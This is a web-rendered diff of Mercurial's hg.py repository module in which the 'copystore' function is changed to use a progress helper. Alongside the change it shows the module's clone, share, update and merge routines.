##// END OF EJS Templates
copystore: use progress helper...
Martin von Zweigbergk -
r38399:63e6f5ae default
parent child Browse files
Show More
@@ -1,1170 +1,1163 b''
1 1 # hg.py - repository classes for mercurial
2 2 #
3 3 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 4 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 5 #
6 6 # This software may be used and distributed according to the terms of the
7 7 # GNU General Public License version 2 or any later version.
8 8
9 9 from __future__ import absolute_import
10 10
11 11 import errno
12 12 import hashlib
13 13 import os
14 14 import shutil
15 15 import stat
16 16
17 17 from .i18n import _
18 18 from .node import (
19 19 nullid,
20 20 )
21 21
22 22 from . import (
23 23 bookmarks,
24 24 bundlerepo,
25 25 cacheutil,
26 26 cmdutil,
27 27 destutil,
28 28 discovery,
29 29 error,
30 30 exchange,
31 31 extensions,
32 32 httppeer,
33 33 localrepo,
34 34 lock,
35 35 logcmdutil,
36 36 logexchange,
37 37 merge as mergemod,
38 38 node,
39 39 phases,
40 40 scmutil,
41 41 sshpeer,
42 42 statichttprepo,
43 43 ui as uimod,
44 44 unionrepo,
45 45 url,
46 46 util,
47 47 verify as verifymod,
48 48 vfs as vfsmod,
49 49 )
50 50
51 51 from .utils import (
52 52 stringutil,
53 53 )
54 54
55 55 release = lock.release
56 56
57 57 # shared features
58 58 sharedbookmarks = 'bookmarks'
59 59
60 60 def _local(path):
61 61 path = util.expandpath(util.urllocalpath(path))
62 62 return (os.path.isfile(path) and bundlerepo or localrepo)
63 63
64 64 def addbranchrevs(lrepo, other, branches, revs):
65 65 peer = other.peer() # a courtesy to callers using a localrepo for other
66 66 hashbranch, branches = branches
67 67 if not hashbranch and not branches:
68 68 x = revs or None
69 69 if revs:
70 70 y = revs[0]
71 71 else:
72 72 y = None
73 73 return x, y
74 74 if revs:
75 75 revs = list(revs)
76 76 else:
77 77 revs = []
78 78
79 79 if not peer.capable('branchmap'):
80 80 if branches:
81 81 raise error.Abort(_("remote branch lookup not supported"))
82 82 revs.append(hashbranch)
83 83 return revs, revs[0]
84 84
85 85 with peer.commandexecutor() as e:
86 86 branchmap = e.callcommand('branchmap', {}).result()
87 87
88 88 def primary(branch):
89 89 if branch == '.':
90 90 if not lrepo:
91 91 raise error.Abort(_("dirstate branch not accessible"))
92 92 branch = lrepo.dirstate.branch()
93 93 if branch in branchmap:
94 94 revs.extend(node.hex(r) for r in reversed(branchmap[branch]))
95 95 return True
96 96 else:
97 97 return False
98 98
99 99 for branch in branches:
100 100 if not primary(branch):
101 101 raise error.RepoLookupError(_("unknown branch '%s'") % branch)
102 102 if hashbranch:
103 103 if not primary(hashbranch):
104 104 revs.append(hashbranch)
105 105 return revs, revs[0]
106 106
107 107 def parseurl(path, branches=None):
108 108 '''parse url#branch, returning (url, (branch, branches))'''
109 109
110 110 u = util.url(path)
111 111 branch = None
112 112 if u.fragment:
113 113 branch = u.fragment
114 114 u.fragment = None
115 115 return bytes(u), (branch, branches or [])
116 116
117 117 schemes = {
118 118 'bundle': bundlerepo,
119 119 'union': unionrepo,
120 120 'file': _local,
121 121 'http': httppeer,
122 122 'https': httppeer,
123 123 'ssh': sshpeer,
124 124 'static-http': statichttprepo,
125 125 }
126 126
127 127 def _peerlookup(path):
128 128 u = util.url(path)
129 129 scheme = u.scheme or 'file'
130 130 thing = schemes.get(scheme) or schemes['file']
131 131 try:
132 132 return thing(path)
133 133 except TypeError:
134 134 # we can't test callable(thing) because 'thing' can be an unloaded
135 135 # module that implements __call__
136 136 if not util.safehasattr(thing, 'instance'):
137 137 raise
138 138 return thing
139 139
140 140 def islocal(repo):
141 141 '''return true if repo (or path pointing to repo) is local'''
142 142 if isinstance(repo, bytes):
143 143 try:
144 144 return _peerlookup(repo).islocal(repo)
145 145 except AttributeError:
146 146 return False
147 147 return repo.local()
148 148
149 149 def openpath(ui, path):
150 150 '''open path with open if local, url.open if remote'''
151 151 pathurl = util.url(path, parsequery=False, parsefragment=False)
152 152 if pathurl.islocal():
153 153 return util.posixfile(pathurl.localpath(), 'rb')
154 154 else:
155 155 return url.open(ui, path)
156 156
157 157 # a list of (ui, repo) functions called for wire peer initialization
158 158 wirepeersetupfuncs = []
159 159
160 160 def _peerorrepo(ui, path, create=False, presetupfuncs=None,
161 161 intents=None):
162 162 """return a repository object for the specified path"""
163 163 obj = _peerlookup(path).instance(ui, path, create, intents=intents)
164 164 ui = getattr(obj, "ui", ui)
165 165 for f in presetupfuncs or []:
166 166 f(ui, obj)
167 167 for name, module in extensions.extensions(ui):
168 168 hook = getattr(module, 'reposetup', None)
169 169 if hook:
170 170 hook(ui, obj)
171 171 if not obj.local():
172 172 for f in wirepeersetupfuncs:
173 173 f(ui, obj)
174 174 return obj
175 175
176 176 def repository(ui, path='', create=False, presetupfuncs=None, intents=None):
177 177 """return a repository object for the specified path"""
178 178 peer = _peerorrepo(ui, path, create, presetupfuncs=presetupfuncs,
179 179 intents=intents)
180 180 repo = peer.local()
181 181 if not repo:
182 182 raise error.Abort(_("repository '%s' is not local") %
183 183 (path or peer.url()))
184 184 return repo.filtered('visible')
185 185
186 186 def peer(uiorrepo, opts, path, create=False, intents=None):
187 187 '''return a repository peer for the specified path'''
188 188 rui = remoteui(uiorrepo, opts)
189 189 return _peerorrepo(rui, path, create, intents=intents).peer()
190 190
191 191 def defaultdest(source):
192 192 '''return default destination of clone if none is given
193 193
194 194 >>> defaultdest(b'foo')
195 195 'foo'
196 196 >>> defaultdest(b'/foo/bar')
197 197 'bar'
198 198 >>> defaultdest(b'/')
199 199 ''
200 200 >>> defaultdest(b'')
201 201 ''
202 202 >>> defaultdest(b'http://example.org/')
203 203 ''
204 204 >>> defaultdest(b'http://example.org/foo/')
205 205 'foo'
206 206 '''
207 207 path = util.url(source).path
208 208 if not path:
209 209 return ''
210 210 return os.path.basename(os.path.normpath(path))
211 211
212 212 def sharedreposource(repo):
213 213 """Returns repository object for source repository of a shared repo.
214 214
215 215 If repo is not a shared repository, returns None.
216 216 """
217 217 if repo.sharedpath == repo.path:
218 218 return None
219 219
220 220 if util.safehasattr(repo, 'srcrepo') and repo.srcrepo:
221 221 return repo.srcrepo
222 222
223 223 # the sharedpath always ends in the .hg; we want the path to the repo
224 224 source = repo.vfs.split(repo.sharedpath)[0]
225 225 srcurl, branches = parseurl(source)
226 226 srcrepo = repository(repo.ui, srcurl)
227 227 repo.srcrepo = srcrepo
228 228 return srcrepo
229 229
230 230 def share(ui, source, dest=None, update=True, bookmarks=True, defaultpath=None,
231 231 relative=False):
232 232 '''create a shared repository'''
233 233
234 234 if not islocal(source):
235 235 raise error.Abort(_('can only share local repositories'))
236 236
237 237 if not dest:
238 238 dest = defaultdest(source)
239 239 else:
240 240 dest = ui.expandpath(dest)
241 241
242 242 if isinstance(source, bytes):
243 243 origsource = ui.expandpath(source)
244 244 source, branches = parseurl(origsource)
245 245 srcrepo = repository(ui, source)
246 246 rev, checkout = addbranchrevs(srcrepo, srcrepo, branches, None)
247 247 else:
248 248 srcrepo = source.local()
249 249 origsource = source = srcrepo.url()
250 250 checkout = None
251 251
252 252 sharedpath = srcrepo.sharedpath # if our source is already sharing
253 253
254 254 destwvfs = vfsmod.vfs(dest, realpath=True)
255 255 destvfs = vfsmod.vfs(os.path.join(destwvfs.base, '.hg'), realpath=True)
256 256
257 257 if destvfs.lexists():
258 258 raise error.Abort(_('destination already exists'))
259 259
260 260 if not destwvfs.isdir():
261 261 destwvfs.mkdir()
262 262 destvfs.makedir()
263 263
264 264 requirements = ''
265 265 try:
266 266 requirements = srcrepo.vfs.read('requires')
267 267 except IOError as inst:
268 268 if inst.errno != errno.ENOENT:
269 269 raise
270 270
271 271 if relative:
272 272 try:
273 273 sharedpath = os.path.relpath(sharedpath, destvfs.base)
274 274 requirements += 'relshared\n'
275 275 except (IOError, ValueError) as e:
276 276 # ValueError is raised on Windows if the drive letters differ on
277 277 # each path
278 278 raise error.Abort(_('cannot calculate relative path'),
279 279 hint=stringutil.forcebytestr(e))
280 280 else:
281 281 requirements += 'shared\n'
282 282
283 283 destvfs.write('requires', requirements)
284 284 destvfs.write('sharedpath', sharedpath)
285 285
286 286 r = repository(ui, destwvfs.base)
287 287 postshare(srcrepo, r, bookmarks=bookmarks, defaultpath=defaultpath)
288 288 _postshareupdate(r, update, checkout=checkout)
289 289 return r
290 290
291 291 def unshare(ui, repo):
292 292 """convert a shared repository to a normal one
293 293
294 294 Copy the store data to the repo and remove the sharedpath data.
295 295 """
296 296
297 297 destlock = lock = None
298 298 lock = repo.lock()
299 299 try:
300 300 # we use locks here because if we race with commit, we
301 301 # can end up with extra data in the cloned revlogs that's
302 302 # not pointed to by changesets, thus causing verify to
303 303 # fail
304 304
305 305 destlock = copystore(ui, repo, repo.path)
306 306
307 307 sharefile = repo.vfs.join('sharedpath')
308 308 util.rename(sharefile, sharefile + '.old')
309 309
310 310 repo.requirements.discard('shared')
311 311 repo.requirements.discard('relshared')
312 312 repo._writerequirements()
313 313 finally:
314 314 destlock and destlock.release()
315 315 lock and lock.release()
316 316
317 317 # update store, spath, svfs and sjoin of repo
318 318 repo.unfiltered().__init__(repo.baseui, repo.root)
319 319
320 320 # TODO: figure out how to access subrepos that exist, but were previously
321 321 # removed from .hgsub
322 322 c = repo['.']
323 323 subs = c.substate
324 324 for s in sorted(subs):
325 325 c.sub(s).unshare()
326 326
327 327 def postshare(sourcerepo, destrepo, bookmarks=True, defaultpath=None):
328 328 """Called after a new shared repo is created.
329 329
330 330 The new repo only has a requirements file and pointer to the source.
331 331 This function configures additional shared data.
332 332
333 333 Extensions can wrap this function and write additional entries to
334 334 destrepo/.hg/shared to indicate additional pieces of data to be shared.
335 335 """
336 336 default = defaultpath or sourcerepo.ui.config('paths', 'default')
337 337 if default:
338 338 template = ('[paths]\n'
339 339 'default = %s\n')
340 340 destrepo.vfs.write('hgrc', util.tonativeeol(template % default))
341 341
342 342 with destrepo.wlock():
343 343 if bookmarks:
344 344 destrepo.vfs.write('shared', sharedbookmarks + '\n')
345 345
346 346 def _postshareupdate(repo, update, checkout=None):
347 347 """Maybe perform a working directory update after a shared repo is created.
348 348
349 349 ``update`` can be a boolean or a revision to update to.
350 350 """
351 351 if not update:
352 352 return
353 353
354 354 repo.ui.status(_("updating working directory\n"))
355 355 if update is not True:
356 356 checkout = update
357 357 for test in (checkout, 'default', 'tip'):
358 358 if test is None:
359 359 continue
360 360 try:
361 361 uprev = repo.lookup(test)
362 362 break
363 363 except error.RepoLookupError:
364 364 continue
365 365 _update(repo, uprev)
366 366
367 367 def copystore(ui, srcrepo, destpath):
368 368 '''copy files from store of srcrepo in destpath
369 369
370 370 returns destlock
371 371 '''
372 372 destlock = None
373 373 try:
374 374 hardlink = None
375 topic = _('linking') if hardlink else _('copying')
376 progress = ui.makeprogress(topic)
375 377 num = 0
376 closetopic = [None]
377 def prog(topic, pos):
378 if pos is None:
379 closetopic[0] = topic
380 else:
381 ui.progress(topic, pos + num)
382 378 srcpublishing = srcrepo.publishing()
383 379 srcvfs = vfsmod.vfs(srcrepo.sharedpath)
384 380 dstvfs = vfsmod.vfs(destpath)
385 381 for f in srcrepo.store.copylist():
386 382 if srcpublishing and f.endswith('phaseroots'):
387 383 continue
388 384 dstbase = os.path.dirname(f)
389 385 if dstbase and not dstvfs.exists(dstbase):
390 386 dstvfs.mkdir(dstbase)
391 387 if srcvfs.exists(f):
392 388 if f.endswith('data'):
393 389 # 'dstbase' may be empty (e.g. revlog format 0)
394 390 lockfile = os.path.join(dstbase, "lock")
395 391 # lock to avoid premature writing to the target
396 392 destlock = lock.lock(dstvfs, lockfile)
397 393 hardlink, n = util.copyfiles(srcvfs.join(f), dstvfs.join(f),
398 hardlink, progress=prog)
394 hardlink, progress)
399 395 num += n
400 396 if hardlink:
401 397 ui.debug("linked %d files\n" % num)
402 if closetopic[0]:
403 ui.progress(closetopic[0], None)
404 398 else:
405 399 ui.debug("copied %d files\n" % num)
406 if closetopic[0]:
407 ui.progress(closetopic[0], None)
400 progress.complete()
408 401 return destlock
409 402 except: # re-raises
410 403 release(destlock)
411 404 raise
412 405
413 406 def clonewithshare(ui, peeropts, sharepath, source, srcpeer, dest, pull=False,
414 407 rev=None, update=True, stream=False):
415 408 """Perform a clone using a shared repo.
416 409
417 410 The store for the repository will be located at <sharepath>/.hg. The
418 411 specified revisions will be cloned or pulled from "source". A shared repo
419 412 will be created at "dest" and a working copy will be created if "update" is
420 413 True.
421 414 """
422 415 revs = None
423 416 if rev:
424 417 if not srcpeer.capable('lookup'):
425 418 raise error.Abort(_("src repository does not support "
426 419 "revision lookup and so doesn't "
427 420 "support clone by revision"))
428 421
429 422 # TODO this is batchable.
430 423 remoterevs = []
431 424 for r in rev:
432 425 with srcpeer.commandexecutor() as e:
433 426 remoterevs.append(e.callcommand('lookup', {
434 427 'key': r,
435 428 }).result())
436 429 revs = remoterevs
437 430
438 431 # Obtain a lock before checking for or cloning the pooled repo otherwise
439 432 # 2 clients may race creating or populating it.
440 433 pooldir = os.path.dirname(sharepath)
441 434 # lock class requires the directory to exist.
442 435 try:
443 436 util.makedir(pooldir, False)
444 437 except OSError as e:
445 438 if e.errno != errno.EEXIST:
446 439 raise
447 440
448 441 poolvfs = vfsmod.vfs(pooldir)
449 442 basename = os.path.basename(sharepath)
450 443
451 444 with lock.lock(poolvfs, '%s.lock' % basename):
452 445 if os.path.exists(sharepath):
453 446 ui.status(_('(sharing from existing pooled repository %s)\n') %
454 447 basename)
455 448 else:
456 449 ui.status(_('(sharing from new pooled repository %s)\n') % basename)
457 450 # Always use pull mode because hardlinks in share mode don't work
458 451 # well. Never update because working copies aren't necessary in
459 452 # share mode.
460 453 clone(ui, peeropts, source, dest=sharepath, pull=True,
461 454 revs=rev, update=False, stream=stream)
462 455
463 456 # Resolve the value to put in [paths] section for the source.
464 457 if islocal(source):
465 458 defaultpath = os.path.abspath(util.urllocalpath(source))
466 459 else:
467 460 defaultpath = source
468 461
469 462 sharerepo = repository(ui, path=sharepath)
470 463 share(ui, sharerepo, dest=dest, update=False, bookmarks=False,
471 464 defaultpath=defaultpath)
472 465
473 466 # We need to perform a pull against the dest repo to fetch bookmarks
474 467 # and other non-store data that isn't shared by default. In the case of
475 468 # non-existing shared repo, this means we pull from the remote twice. This
476 469 # is a bit weird. But at the time it was implemented, there wasn't an easy
477 470 # way to pull just non-changegroup data.
478 471 destrepo = repository(ui, path=dest)
479 472 exchange.pull(destrepo, srcpeer, heads=revs)
480 473
481 474 _postshareupdate(destrepo, update)
482 475
483 476 return srcpeer, peer(ui, peeropts, dest)
484 477
485 478 # Recomputing branch cache might be slow on big repos,
486 479 # so just copy it
487 480 def _copycache(srcrepo, dstcachedir, fname):
488 481 """copy a cache from srcrepo to destcachedir (if it exists)"""
489 482 srcbranchcache = srcrepo.vfs.join('cache/%s' % fname)
490 483 dstbranchcache = os.path.join(dstcachedir, fname)
491 484 if os.path.exists(srcbranchcache):
492 485 if not os.path.exists(dstcachedir):
493 486 os.mkdir(dstcachedir)
494 487 util.copyfile(srcbranchcache, dstbranchcache)
495 488
496 489 def clone(ui, peeropts, source, dest=None, pull=False, revs=None,
497 490 update=True, stream=False, branch=None, shareopts=None):
498 491 """Make a copy of an existing repository.
499 492
500 493 Create a copy of an existing repository in a new directory. The
501 494 source and destination are URLs, as passed to the repository
502 495 function. Returns a pair of repository peers, the source and
503 496 newly created destination.
504 497
505 498 The location of the source is added to the new repository's
506 499 .hg/hgrc file, as the default to be used for future pulls and
507 500 pushes.
508 501
509 502 If an exception is raised, the partly cloned/updated destination
510 503 repository will be deleted.
511 504
512 505 Arguments:
513 506
514 507 source: repository object or URL
515 508
516 509 dest: URL of destination repository to create (defaults to base
517 510 name of source repository)
518 511
519 512 pull: always pull from source repository, even in local case or if the
520 513 server prefers streaming
521 514
522 515 stream: stream raw data uncompressed from repository (fast over
523 516 LAN, slow over WAN)
524 517
525 518 revs: revision to clone up to (implies pull=True)
526 519
527 520 update: update working directory after clone completes, if
528 521 destination is local repository (True means update to default rev,
529 522 anything else is treated as a revision)
530 523
531 524 branch: branches to clone
532 525
533 526 shareopts: dict of options to control auto sharing behavior. The "pool" key
534 527 activates auto sharing mode and defines the directory for stores. The
535 528 "mode" key determines how to construct the directory name of the shared
536 529 repository. "identity" means the name is derived from the node of the first
537 530 changeset in the repository. "remote" means the name is derived from the
538 531 remote's path/URL. Defaults to "identity."
539 532 """
540 533
541 534 if isinstance(source, bytes):
542 535 origsource = ui.expandpath(source)
543 536 source, branches = parseurl(origsource, branch)
544 537 srcpeer = peer(ui, peeropts, source)
545 538 else:
546 539 srcpeer = source.peer() # in case we were called with a localrepo
547 540 branches = (None, branch or [])
548 541 origsource = source = srcpeer.url()
549 542 revs, checkout = addbranchrevs(srcpeer, srcpeer, branches, revs)
550 543
551 544 if dest is None:
552 545 dest = defaultdest(source)
553 546 if dest:
554 547 ui.status(_("destination directory: %s\n") % dest)
555 548 else:
556 549 dest = ui.expandpath(dest)
557 550
558 551 dest = util.urllocalpath(dest)
559 552 source = util.urllocalpath(source)
560 553
561 554 if not dest:
562 555 raise error.Abort(_("empty destination path is not valid"))
563 556
564 557 destvfs = vfsmod.vfs(dest, expandpath=True)
565 558 if destvfs.lexists():
566 559 if not destvfs.isdir():
567 560 raise error.Abort(_("destination '%s' already exists") % dest)
568 561 elif destvfs.listdir():
569 562 raise error.Abort(_("destination '%s' is not empty") % dest)
570 563
571 564 shareopts = shareopts or {}
572 565 sharepool = shareopts.get('pool')
573 566 sharenamemode = shareopts.get('mode')
574 567 if sharepool and islocal(dest):
575 568 sharepath = None
576 569 if sharenamemode == 'identity':
577 570 # Resolve the name from the initial changeset in the remote
578 571 # repository. This returns nullid when the remote is empty. It
579 572 # raises RepoLookupError if revision 0 is filtered or otherwise
580 573 # not available. If we fail to resolve, sharing is not enabled.
581 574 try:
582 575 with srcpeer.commandexecutor() as e:
583 576 rootnode = e.callcommand('lookup', {
584 577 'key': '0',
585 578 }).result()
586 579
587 580 if rootnode != node.nullid:
588 581 sharepath = os.path.join(sharepool, node.hex(rootnode))
589 582 else:
590 583 ui.status(_('(not using pooled storage: '
591 584 'remote appears to be empty)\n'))
592 585 except error.RepoLookupError:
593 586 ui.status(_('(not using pooled storage: '
594 587 'unable to resolve identity of remote)\n'))
595 588 elif sharenamemode == 'remote':
596 589 sharepath = os.path.join(
597 590 sharepool, node.hex(hashlib.sha1(source).digest()))
598 591 else:
599 592 raise error.Abort(_('unknown share naming mode: %s') %
600 593 sharenamemode)
601 594
602 595 if sharepath:
603 596 return clonewithshare(ui, peeropts, sharepath, source, srcpeer,
604 597 dest, pull=pull, rev=revs, update=update,
605 598 stream=stream)
606 599
607 600 srclock = destlock = cleandir = None
608 601 srcrepo = srcpeer.local()
609 602 try:
610 603 abspath = origsource
611 604 if islocal(origsource):
612 605 abspath = os.path.abspath(util.urllocalpath(origsource))
613 606
614 607 if islocal(dest):
615 608 cleandir = dest
616 609
617 610 copy = False
618 611 if (srcrepo and srcrepo.cancopy() and islocal(dest)
619 612 and not phases.hassecret(srcrepo)):
620 613 copy = not pull and not revs
621 614
622 615 if copy:
623 616 try:
624 617 # we use a lock here because if we race with commit, we
625 618 # can end up with extra data in the cloned revlogs that's
626 619 # not pointed to by changesets, thus causing verify to
627 620 # fail
628 621 srclock = srcrepo.lock(wait=False)
629 622 except error.LockError:
630 623 copy = False
631 624
632 625 if copy:
633 626 srcrepo.hook('preoutgoing', throw=True, source='clone')
634 627 hgdir = os.path.realpath(os.path.join(dest, ".hg"))
635 628 if not os.path.exists(dest):
636 629 os.mkdir(dest)
637 630 else:
638 631 # only clean up directories we create ourselves
639 632 cleandir = hgdir
640 633 try:
641 634 destpath = hgdir
642 635 util.makedir(destpath, notindexed=True)
643 636 except OSError as inst:
644 637 if inst.errno == errno.EEXIST:
645 638 cleandir = None
646 639 raise error.Abort(_("destination '%s' already exists")
647 640 % dest)
648 641 raise
649 642
650 643 destlock = copystore(ui, srcrepo, destpath)
651 644 # copy bookmarks over
652 645 srcbookmarks = srcrepo.vfs.join('bookmarks')
653 646 dstbookmarks = os.path.join(destpath, 'bookmarks')
654 647 if os.path.exists(srcbookmarks):
655 648 util.copyfile(srcbookmarks, dstbookmarks)
656 649
657 650 dstcachedir = os.path.join(destpath, 'cache')
658 651 for cache in cacheutil.cachetocopy(srcrepo):
659 652 _copycache(srcrepo, dstcachedir, cache)
660 653
661 654 # we need to re-init the repo after manually copying the data
662 655 # into it
663 656 destpeer = peer(srcrepo, peeropts, dest)
664 657 srcrepo.hook('outgoing', source='clone',
665 658 node=node.hex(node.nullid))
666 659 else:
667 660 try:
668 661 destpeer = peer(srcrepo or ui, peeropts, dest, create=True)
669 662 # only pass ui when no srcrepo
670 663 except OSError as inst:
671 664 if inst.errno == errno.EEXIST:
672 665 cleandir = None
673 666 raise error.Abort(_("destination '%s' already exists")
674 667 % dest)
675 668 raise
676 669
677 670 if revs:
678 671 if not srcpeer.capable('lookup'):
679 672 raise error.Abort(_("src repository does not support "
680 673 "revision lookup and so doesn't "
681 674 "support clone by revision"))
682 675
683 676 # TODO this is batchable.
684 677 remoterevs = []
685 678 for rev in revs:
686 679 with srcpeer.commandexecutor() as e:
687 680 remoterevs.append(e.callcommand('lookup', {
688 681 'key': rev,
689 682 }).result())
690 683 revs = remoterevs
691 684
692 685 checkout = revs[0]
693 686 else:
694 687 revs = None
695 688 local = destpeer.local()
696 689 if local:
697 690 u = util.url(abspath)
698 691 defaulturl = bytes(u)
699 692 local.ui.setconfig('paths', 'default', defaulturl, 'clone')
700 693 if not stream:
701 694 if pull:
702 695 stream = False
703 696 else:
704 697 stream = None
705 698 # internal config: ui.quietbookmarkmove
706 699 overrides = {('ui', 'quietbookmarkmove'): True}
707 700 with local.ui.configoverride(overrides, 'clone'):
708 701 exchange.pull(local, srcpeer, revs,
709 702 streamclonerequested=stream)
710 703 elif srcrepo:
711 704 exchange.push(srcrepo, destpeer, revs=revs,
712 705 bookmarks=srcrepo._bookmarks.keys())
713 706 else:
714 707 raise error.Abort(_("clone from remote to remote not supported")
715 708 )
716 709
717 710 cleandir = None
718 711
719 712 destrepo = destpeer.local()
720 713 if destrepo:
721 714 template = uimod.samplehgrcs['cloned']
722 715 u = util.url(abspath)
723 716 u.passwd = None
724 717 defaulturl = bytes(u)
725 718 destrepo.vfs.write('hgrc', util.tonativeeol(template % defaulturl))
726 719 destrepo.ui.setconfig('paths', 'default', defaulturl, 'clone')
727 720
728 721 if ui.configbool('experimental', 'remotenames'):
729 722 logexchange.pullremotenames(destrepo, srcpeer)
730 723
731 724 if update:
732 725 if update is not True:
733 726 with srcpeer.commandexecutor() as e:
734 727 checkout = e.callcommand('lookup', {
735 728 'key': update,
736 729 }).result()
737 730
738 731 uprev = None
739 732 status = None
740 733 if checkout is not None:
741 734 if checkout in destrepo:
742 735 uprev = checkout
743 736 else:
744 737 if update is not True:
745 738 try:
746 739 uprev = destrepo.lookup(update)
747 740 except error.RepoLookupError:
748 741 pass
749 742 if uprev is None:
750 743 try:
751 744 uprev = destrepo._bookmarks['@']
752 745 update = '@'
753 746 bn = destrepo[uprev].branch()
754 747 if bn == 'default':
755 748 status = _("updating to bookmark @\n")
756 749 else:
757 750 status = (_("updating to bookmark @ on branch %s\n")
758 751 % bn)
759 752 except KeyError:
760 753 try:
761 754 uprev = destrepo.branchtip('default')
762 755 except error.RepoLookupError:
763 756 uprev = destrepo.lookup('tip')
764 757 if not status:
765 758 bn = destrepo[uprev].branch()
766 759 status = _("updating to branch %s\n") % bn
767 760 destrepo.ui.status(status)
768 761 _update(destrepo, uprev)
769 762 if update in destrepo._bookmarks:
770 763 bookmarks.activate(destrepo, update)
771 764 finally:
772 765 release(srclock, destlock)
773 766 if cleandir is not None:
774 767 shutil.rmtree(cleandir, True)
775 768 if srcpeer is not None:
776 769 srcpeer.close()
777 770 return srcpeer, destpeer
778 771
779 772 def _showstats(repo, stats, quietempty=False):
780 773 if quietempty and stats.isempty():
781 774 return
782 775 repo.ui.status(_("%d files updated, %d files merged, "
783 776 "%d files removed, %d files unresolved\n") % (
784 777 stats.updatedcount, stats.mergedcount,
785 778 stats.removedcount, stats.unresolvedcount))
786 779
787 780 def updaterepo(repo, node, overwrite, updatecheck=None):
788 781 """Update the working directory to node.
789 782
790 783 When overwrite is set, changes are clobbered, merged else
791 784
792 785 returns stats (see pydoc mercurial.merge.applyupdates)"""
793 786 return mergemod.update(repo, node, False, overwrite,
794 787 labels=['working copy', 'destination'],
795 788 updatecheck=updatecheck)
796 789
797 790 def update(repo, node, quietempty=False, updatecheck=None):
798 791 """update the working directory to node"""
799 792 stats = updaterepo(repo, node, False, updatecheck=updatecheck)
800 793 _showstats(repo, stats, quietempty)
801 794 if stats.unresolvedcount:
802 795 repo.ui.status(_("use 'hg resolve' to retry unresolved file merges\n"))
803 796 return stats.unresolvedcount > 0
804 797
805 798 # naming conflict in clone()
806 799 _update = update
807 800
808 801 def clean(repo, node, show_stats=True, quietempty=False):
809 802 """forcibly switch the working directory to node, clobbering changes"""
810 803 stats = updaterepo(repo, node, True)
811 804 repo.vfs.unlinkpath('graftstate', ignoremissing=True)
812 805 if show_stats:
813 806 _showstats(repo, stats, quietempty)
814 807 return stats.unresolvedcount > 0
815 808
816 809 # naming conflict in updatetotally()
817 810 _clean = clean
818 811
819 812 def updatetotally(ui, repo, checkout, brev, clean=False, updatecheck=None):
820 813 """Update the working directory with extra care for non-file components
821 814
822 815 This takes care of non-file components below:
823 816
824 817 :bookmark: might be advanced or (in)activated
825 818
826 819 This takes arguments below:
827 820
828 821 :checkout: to which revision the working directory is updated
829 822 :brev: a name, which might be a bookmark to be activated after updating
830 823 :clean: whether changes in the working directory can be discarded
831 824 :updatecheck: how to deal with a dirty working directory
832 825
833 826 Valid values for updatecheck are (None => linear):
834 827
835 828 * abort: abort if the working directory is dirty
836 829 * none: don't check (merge working directory changes into destination)
837 830 * linear: check that update is linear before merging working directory
838 831 changes into destination
839 832 * noconflict: check that the update does not result in file merges
840 833
841 834 This returns whether conflict is detected at updating or not.
842 835 """
843 836 if updatecheck is None:
844 837 updatecheck = ui.config('commands', 'update.check')
845 838 if updatecheck not in ('abort', 'none', 'linear', 'noconflict'):
846 839 # If not configured, or invalid value configured
847 840 updatecheck = 'linear'
848 841 with repo.wlock():
849 842 movemarkfrom = None
850 843 warndest = False
851 844 if checkout is None:
852 845 updata = destutil.destupdate(repo, clean=clean)
853 846 checkout, movemarkfrom, brev = updata
854 847 warndest = True
855 848
856 849 if clean:
857 850 ret = _clean(repo, checkout)
858 851 else:
859 852 if updatecheck == 'abort':
860 853 cmdutil.bailifchanged(repo, merge=False)
861 854 updatecheck = 'none'
862 855 ret = _update(repo, checkout, updatecheck=updatecheck)
863 856
864 857 if not ret and movemarkfrom:
865 858 if movemarkfrom == repo['.'].node():
866 859 pass # no-op update
867 860 elif bookmarks.update(repo, [movemarkfrom], repo['.'].node()):
868 861 b = ui.label(repo._activebookmark, 'bookmarks.active')
869 862 ui.status(_("updating bookmark %s\n") % b)
870 863 else:
871 864 # this can happen with a non-linear update
872 865 b = ui.label(repo._activebookmark, 'bookmarks')
873 866 ui.status(_("(leaving bookmark %s)\n") % b)
874 867 bookmarks.deactivate(repo)
875 868 elif brev in repo._bookmarks:
876 869 if brev != repo._activebookmark:
877 870 b = ui.label(brev, 'bookmarks.active')
878 871 ui.status(_("(activating bookmark %s)\n") % b)
879 872 bookmarks.activate(repo, brev)
880 873 elif brev:
881 874 if repo._activebookmark:
882 875 b = ui.label(repo._activebookmark, 'bookmarks')
883 876 ui.status(_("(leaving bookmark %s)\n") % b)
884 877 bookmarks.deactivate(repo)
885 878
886 879 if warndest:
887 880 destutil.statusotherdests(ui, repo)
888 881
889 882 return ret
890 883
891 884 def merge(repo, node, force=None, remind=True, mergeforce=False, labels=None,
892 885 abort=False):
893 886 """Branch merge with node, resolving changes. Return true if any
894 887 unresolved conflicts."""
895 888 if not abort:
896 889 stats = mergemod.update(repo, node, True, force, mergeforce=mergeforce,
897 890 labels=labels)
898 891 else:
899 892 ms = mergemod.mergestate.read(repo)
900 893 if ms.active():
901 894 # there were conflicts
902 895 node = ms.localctx.hex()
903 896 else:
904 897 # there were no conficts, mergestate was not stored
905 898 node = repo['.'].hex()
906 899
907 900 repo.ui.status(_("aborting the merge, updating back to"
908 901 " %s\n") % node[:12])
909 902 stats = mergemod.update(repo, node, branchmerge=False, force=True,
910 903 labels=labels)
911 904
912 905 _showstats(repo, stats)
913 906 if stats.unresolvedcount:
914 907 repo.ui.status(_("use 'hg resolve' to retry unresolved file merges "
915 908 "or 'hg merge --abort' to abandon\n"))
916 909 elif remind and not abort:
917 910 repo.ui.status(_("(branch merge, don't forget to commit)\n"))
918 911 return stats.unresolvedcount > 0
919 912
920 913 def _incoming(displaychlist, subreporecurse, ui, repo, source,
921 914 opts, buffered=False):
922 915 """
923 916 Helper for incoming / gincoming.
924 917 displaychlist gets called with
925 918 (remoterepo, incomingchangesetlist, displayer) parameters,
926 919 and is supposed to contain only code that can't be unified.
927 920 """
928 921 source, branches = parseurl(ui.expandpath(source), opts.get('branch'))
929 922 other = peer(repo, opts, source)
930 923 ui.status(_('comparing with %s\n') % util.hidepassword(source))
931 924 revs, checkout = addbranchrevs(repo, other, branches, opts.get('rev'))
932 925
933 926 if revs:
934 927 revs = [other.lookup(rev) for rev in revs]
935 928 other, chlist, cleanupfn = bundlerepo.getremotechanges(ui, repo, other,
936 929 revs, opts["bundle"], opts["force"])
937 930 try:
938 931 if not chlist:
939 932 ui.status(_("no changes found\n"))
940 933 return subreporecurse()
941 934 ui.pager('incoming')
